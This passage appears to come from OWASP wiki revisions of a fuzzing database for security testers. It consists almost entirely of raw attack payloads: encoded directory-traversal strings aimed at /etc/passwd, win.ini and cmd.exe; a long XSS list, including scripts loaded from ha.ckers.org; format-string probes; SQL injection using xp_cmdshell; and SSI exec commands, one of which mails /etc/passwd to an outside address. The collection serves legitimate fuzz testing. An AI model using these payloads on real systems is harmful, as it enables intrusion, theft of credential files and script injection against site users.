..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
</pre><br />
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".''<br />
<br />
=== XSS Statements - Most effective/most common statements ===<br />
<br />
Testing Statements<br />
<pre><br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <br />
'';!--"<XSS>=&{()}<br />
</pre><br />
<br />
Common exploit code (covers a lot of XSS vulnerabilities)<br />
<pre><br />
'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='<br />
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="<br />
\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'<br />
'); alert('xss'); var x='<br />
\\'); alert(\'xss\');var x=\'<br />
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));<br />
</pre><br />
<br />
=== XSS Statements - Full List ===<br />
<br />
<pre><br />
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT><br />
<IMG SRC="javascript:alert('XSS');"><br />
<IMG SRC=javascript:alert('XSS')><br />
<IMG SRC=JaVaScRiPt:alert('XSS')><br />
<IMG SRC=javascript:alert(&quot;XSS&quot;)><br />
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`><br />
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"><br />
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))><br />
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;><br />
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041><br />
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29><br />
<IMG SRC="jav ascript:alert('XSS');"><br />
<IMG SRC="jav&#x09;ascript:alert('XSS');"><br />
<IMG SRC="jav&#x0A;ascript:alert('XSS');"><br />
<IMG SRC="jav&#x0D;ascript:alert('XSS');"><br />
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out<br />
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out<br />
<IMG SRC=" &#14; javascript:alert('XSS');"><br />
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")><br />
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<<SCRIPT>alert("XSS");//<</SCRIPT><br />
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B><br />
<SCRIPT SRC=//ha.ckers.org/.j><br />
<IMG SRC="javascript:alert('XSS')"<br />
<iframe src=http://ha.ckers.org/scriptlet.html <<br />
<SCRIPT>a=/XSS/\nalert(a.source)</SCRIPT><br />
\";alert('XSS');//<br />
</TITLE><SCRIPT>alert("XSS");</SCRIPT><br />
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"><br />
<BODY BACKGROUND="javascript:alert('XSS')"><br />
<BODY ONLOAD=alert('XSS')><br />
<IMG DYNSRC="javascript:alert('XSS')"><br />
<IMG LOWSRC="javascript:alert('XSS')"><br />
<BGSOUND SRC="javascript:alert('XSS');"><br />
<BR SIZE="&{alert('XSS')}"><br />
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER><br />
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"><br />
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"><br />
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE><br />
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"><br />
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE><br />
<XSS STYLE="behavior: url(xss.htc);"><br />
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS<br />
<IMG SRC='vbscript:msgbox("XSS")'><br />
¼script¾alert(¢XSS¢)¼/script¾<br />
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"><br />
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"><br />
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"><br />
<IFRAME SRC="javascript:alert('XSS');"></IFRAME><br />
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET><br />
<TABLE BACKGROUND="javascript:alert('XSS')"><br />
<TABLE><TD BACKGROUND="javascript:alert('XSS')"><br />
<DIV STYLE="background-image: url(javascript:alert('XSS'))"><br />
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"><br />
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"><br />
<DIV STYLE="width: expression(alert('XSS'));"><br />
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE><br />
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"><br />
<XSS STYLE="xss:expression(alert('XSS'))"><br />
exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'><br />
<STYLE TYPE="text/javascript">alert('XSS');</STYLE><br />
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A><br />
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE><br />
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--><br />
<BASE HREF="javascript:alert('XSS');//"><br />
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT><br />
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT><br />
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED><br />
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED><br />
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML><br />
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN><br />
<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN><br />
<XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN><br />
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML><br />
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT><br />
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--><br />
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?><br />
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"><br />
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-<br />
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<A HREF="http://66.102.7.147/">XSS</A><br />
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A><br />
<A HREF="http://1113982867/">XSS</A><br />
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A><br />
<A HREF="http://0102.0146.0007.00000223/">XSS</A><br />
<A HREF="h\ntt\tp://6&#9;6.000146.0x7.147/">XSS</A><br />
<A HREF="//www.google.com/">XSS</A><br />
<A HREF="//google">XSS</A><br />
<A HREF="http://google.com/">XSS</A><br />
<A HREF="http://www.google.com./">XSS</A><br />
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A><br />
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A><br />
<a href="javas&#99;ript&#35;document.write("XSS-XSS-XSS");"><br />
<a href="javas&#99;ript&#35;document.write("XSS-XSS-XSS");"><br />
<div onmouseover="document.write("XSS-XSS-XSS");"><br />
<img src="javascript:document.write("XSS-XSS-XSS");"><br />
<img dynsrc="javascript:document.write("XSS-XSS-XSS");"><br />
<input type="image" dynsrc="javascript:document.write("XSS-XSS-XSS");"><br />
<bgsound src="javascript:document.write("XSS-XSS-XSS");"><br />
&<script>document.write("XSS-XSS-XSS");</script><br />
&{document.write("XSS-XSS-XSS");};<br />
<img src=&{document.write("XSS-XSS-XSS");};><br />
<link rel="stylesheet" href="javascript:document.write("XSS-XSS-XSS");"><br />
<iframe src="vbscript:document.write("XSS-XSS-XSS");"><br />
<img src="mocha:document.write("XSS-XSS-XSS");"><br />
<img src="livescript:document.write("XSS-XSS-XSS");"><br />
<a href="about:<s&#99;ript>document.write("XSS-XSS-XSS");</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:document.write("XSS-XSS-XSS");"><br />
<body onload="document.write("XSS-XSS-XSS");"><br />
<div style="background-image: url(javascript:document.write("XSS-XSS-XSS"););"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"><br />
<div style="width: expression(document.write("XSS-XSS-XSS"););"><br />
<style type="text/javascript">document.write("XSS-XSS-XSS");</style><br />
<object classid="clsid:..." codebase="javascript:document.write("XSS-XSS-XSS");"><br />
<style><!--</style><script>document.write("XSS-XSS-XSS");//--></script><br />
<![CDATA[<!--]]><script>document.write("XSS-XSS-XSS");//--></script><br />
<!-- -- --><script>document.write("XSS-XSS-XSS");</script><!-- -- --><br />
<<script>document.write("XSS-XSS-XSS");</script><br />
<img src="blah"onmouseover="document.write("XSS-XSS-XSS");"><br />
<img src="blah>" onmouseover="document.write("XSS-XSS-XSS");"><br />
<xml src="javascript:document.write("XSS-XSS-XSS");"><br />
<xml id="X"><a><b>&lt;script>document.write("XSS-XSS-XSS");&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
<a href="javas&#99;ript&#35;document.write("XSS-XSS-XSS");"><br />
<div onmouseover="document.write("XSS-XSS-XSS");"><br />
<img src="javascript:document.write("XSS-XSS-XSS");"><br />
<img dynsrc="javascript:document.write("XSS-XSS-XSS");"><br />
<input type="image" dynsrc="javascript:document.write("XSS-XSS-XSS");"><br />
<bgsound src="javascript:document.write("XSS-XSS-XSS");"><br />
&<script>document.write("XSS-XSS-XSS");</script><br />
&{document.write("XSS-XSS-XSS");};<br />
<img src=&{document.write("XSS-XSS-XSS");};><br />
<link rel="stylesheet" href="javascript:document.write("XSS-XSS-XSS");"><br />
<iframe src="vbscript:document.write("XSS-XSS-XSS");"><br />
<img src="mocha:document.write("XSS-XSS-XSS");"><br />
<img src="livescript:document.write("XSS-XSS-XSS");"><br />
<a href="about:<s&#99;ript>document.write("XSS-XSS-XSS");</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:document.write("XSS-XSS-XSS");"><br />
<body onload="document.write("XSS-XSS-XSS");"><br />
<div style="background-image: url(javascript:document.write("XSS-XSS-XSS"););"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"> [Mozilla]<br />
<div style="width: expression(document.write("XSS-XSS-XSS"););"><br />
<style type="text/javascript">document.write("XSS-XSS-XSS");</style><br />
<object classid="clsid:..." codebase="javascript:document.write("XSS-XSS-XSS");"><br />
<style><!--</style><script>document.write("XSS-XSS-XSS");//--></script><br />
<![CDATA[<!--]]><script>document.write("XSS-XSS-XSS");//--></script><br />
<!-- -- --><script>document.write("XSS-XSS-XSS");</script><!-- -- --><br />
<<script>document.write("XSS-XSS-XSS");</script><br />
<img src="blah"onmouseover="document.write("XSS-XSS-XSS");"><br />
<img src="blah>" onmouseover="document.write("XSS-XSS-XSS");"><br />
<xml src="javascript:document.write("XSS-XSS-XSS");"><br />
<xml id="X"><a><b>&lt;script>document.write("XSS-XSS-XSS");&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
[\xC0][\xBC]script>document.write("XSS-XSS-XSS");[\xC0][\xBC]/script><br />
</pre><br />
<br />
=== Format String Statements ===<br />
<br />
<pre><br />
%s%p%x%d<br />
.1024d<br />
%.2049d<br />
%p%p%p%p<br />
%x%x%x%x<br />
%d%d%d%d<br />
%s%s%s%s<br />
%99999999999s<br />
%08x<br />
%%20d<br />
%%20n<br />
%%20x<br />
%%20s<br />
%s%s%s%s%s%s%s%s%s%s<br />
%p%p%p%p%p%p%p%p%p%p<br />
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />
f(x)=%s x 123<br />
f(x)=%x x 255<br />
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x<br />
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s<br />
XXXXX.%p<br />
XXXXX`perl -e 'print ".%p" x 80'`<br />
`perl -e 'print ".%p" x 80'`%n<br />
%08x.%08x.%08x.%08x.%08x\n<br />
XXX0_%08x.%08x.%08x.%08x.%08x\n<br />
%.16705u%2\$hn<br />
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|<br />
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id > /tmp/file; exit;<br />
</pre></div>
Foobar23
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=20910
Category:OWASP Fuzzing Code Database
2007-08-19T22:22:41Z
<p>Foobar23: /* XSS Statements */ Neue Statements</p>
<hr />
<div>This database is a collection of several statements used in code injection software. All to often security professionals use their own repositories of statements collected from several projects for a long time. We want to collect all these statements - compose them - merging the database of several projects like [[WebScarab]] and [[JBroFuzz]] gaining a big dataset of effective statements to provide better testing results.<br />
Please add your own statements and check the statements already added. <br />
<br />
=== SQL Injection Statements ===<br />
<br />
<pre><br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
a" or 1=1--<br />
" or "a" = "a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q =<br />
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A<br />
0<br />
031003000270000<br />
declare @s varchar(22) select @s =<br />
0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
declare @q nvarchar (4000) select @q =<br />
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e<br />
exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
</pre><br />
<br />
=== SSI (Server Side Includes) Statements ===<br />
<br />
<pre><br />
<!--#exec cmd="/bin/ls /" --><br/><br />
<!--#exec cmd="cat /etc/passwd" --><br/><br />
<!--#exec cmd="find / -name *.* -print" --><br/><br />
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/><br />
</pre><br />
<br />
=== Directory Traversal Statements ===<br />
<br />
<pre><br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
